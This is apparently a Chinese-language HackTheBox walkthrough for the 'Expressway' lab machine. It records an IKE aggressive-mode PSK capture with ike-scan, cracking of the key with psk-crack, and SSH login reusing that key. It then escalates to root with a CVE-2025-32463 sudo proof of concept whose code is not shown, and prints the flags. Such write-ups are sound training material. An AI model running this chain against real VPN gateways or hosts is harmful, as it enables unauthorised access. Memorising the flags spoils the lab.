HackTheBox-Expressway

端口扫描

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ sudo nmap -p- --min-rate 10000 10.10.11.87 -oA ports
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 19:23 CST
Nmap scan report for 10.10.11.87
Host is up (0.072s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 10.66 seconds

扫了三次都是只开了 ssh ，因此继续采用 UDP 扫描：

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ sudo nmap -sU --top-ports 20 10.10.11.87 -oA udp             
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 19:25 CST
Nmap scan report for 10.10.11.87
Host is up (0.072s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   closed        snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open          isakmp
514/udp   closed        syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds

看到 500 端口是开放的，对于 500 端口开启的常见服务我并不是很熟悉，继续详细信息扫描：

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ sudo nmap -sU -sC -sV -O -p 500 10.10.11.87 -oA details
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-05 19:56 CST
Nmap scan report for 10.10.11.87
Host is up (0.070s latency).

PORT    STATE SERVICE VERSION
500/udp open  isakmp?
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.49 seconds

IKE 渗透

这里看上去扫出来了一个叫 ike-version 的信息，把这段信息拿给 AI ，他说这运行的是 ISAKMP/IKE 服务，支持 XAUTH（通常用于用户名、密码认证）。

简单搜索学习了一下，IKE 是一种 互联网安全和密钥管理协议 ，这种协议常被用于 VPN网关、防火墙等等。

同时，AI 还建议我使用 ike-scan 这个工具进一步进行扫描。

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ ike-scan -M --aggressive 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=aa1005bc157f41e5)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.087 seconds (11.46 hosts/sec).  1 returned handshake; 0 returned notify

在这个结果中，我们可以看到我们获取到了一些 域名、XAUTH、PSK 等信息。同时，我们能获得这些信息意味着对方的 IKE 支持 积极模式。

IKE 一般有两种模式，一种是 主模式 ，一种是 积极模式。在 主模式 下，传输的信息是加密传输的，而在 积极模式 下，是明文传输的，所以我们可以获得一些重要的信息。

其中比较重要的是这个 PSK ，这叫做 预共享密钥 ，我们可以用 ike-scan 来获取到这个密钥，然后尝试去破解它。如果能够成功破解这个 PSK ，我们可以尝试与靶机建立一个 VPN 连接，从而访问到靶机内部的网络。

使用 ike-scan 尝试获取 PSK ：

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ ike-scan -M -A --id=ike@expressway.htb -Pexpressway_hash.txt 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=2147a070b5a0a367)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.172 seconds (5.83 hosts/sec).  1 returned handshake; 0 returned notify
                                                                                                                                                                                   
┌──(kali㉿kali)-[~/HTB/expressway]
└─$ cat expressway_hash.txt
538735f51c15ec8bd796c471fccb8b618376e3555b916aff380a1af0026a4523261afa2126bab734d4183c77dbf60a496082fa6a4e3731a45a6095cba52ce98b5ca314629c79b51583a4de8ddc0e0de0307a05bd3d08449d89277cd01b1ba38cae817ff082f595e564060512dace2e5239b67d3b5b660779b5290a44b396f49b:6460276676b1fc8cc2d74fb399eb11897aef438eb771ae24a22eb627bfb336feeb9b9066b3ec6ca23d2c925bdf49e56d482e35147351826175b5c64a8f24a695344f733a6b4f33e003b095e9722b8efc12fc9c62990fd380ac88b193e19f6766438373c9d376856aa337adb60a2a992dd2799f9cee6114a5edf8671e16766b0a:2147a070b5a0a367:732e5df69cd787e1:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:c02d5a9ab7fc6d4897b58737cad7cfd2b5234e97:abedad85ff74d22899fe682197106943c891fd5c68c39846ed1c03b4dd169fee:1a872010570203273da0c6ee3ad716d940bb0524

可以看到我们已经获取到 PSK 了，接着尝试用 psk-crack 工具去破解它：

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ psk-crack -d /usr/share/wordlists/rockyou.txt expressway_hash.txt 
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 1a872010570203273da0c6ee3ad716d940bb0524
Ending psk-crack: 8045040 iterations in 2.673 seconds (3009289.29 iterations/sec)

可以看到我们已经破解出了 PSK 为 freakingrockstarontheroad。

获取立足点

想到前面有个 ID 为 ike@expressway.htb ，因此 ike 可能是靶机上的一个合法用户，而 freakingrockstarontheroad 可能是他的 ssh 密码，因此我们尝试用 ssh 进行登录：

┌──(kali㉿kali)-[~/HTB/expressway]
└─$ ssh ike@expressway.htb                          
The authenticity of host 'expressway.htb (10.10.11.87)' can't be established.
ED25519 key fingerprint is SHA256:fZLjHktV7oXzFz9v3ylWFE4BS9rECyxSHdlLrfxRM8g.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:80: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'expressway.htb' (ED25519) to the list of known hosts.
ike@expressway.htb's password: 
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ike@expressway:~$ 

登录成功了，拿到了 user flag :

2fe01866e793fabeee44d776849903d2

提权

将 linpeas.sh 上传到靶机之后运行，看到了 sudo 的版本为 1.9.17 。网上搜索发现，这个版本的 sudo 存在本地提权漏洞 CVE-2025-32463 。于是利用这个 POC 完成了提权：

ike@expressway:/tmp$ vi exp.sh
ike@expressway:/tmp$ chmod +x exp.sh 
ike@expressway:/tmp$ ./exp.sh 
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
root@expressway:/# cd /root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
46e5454dcbf6bf7bfc15326179e33439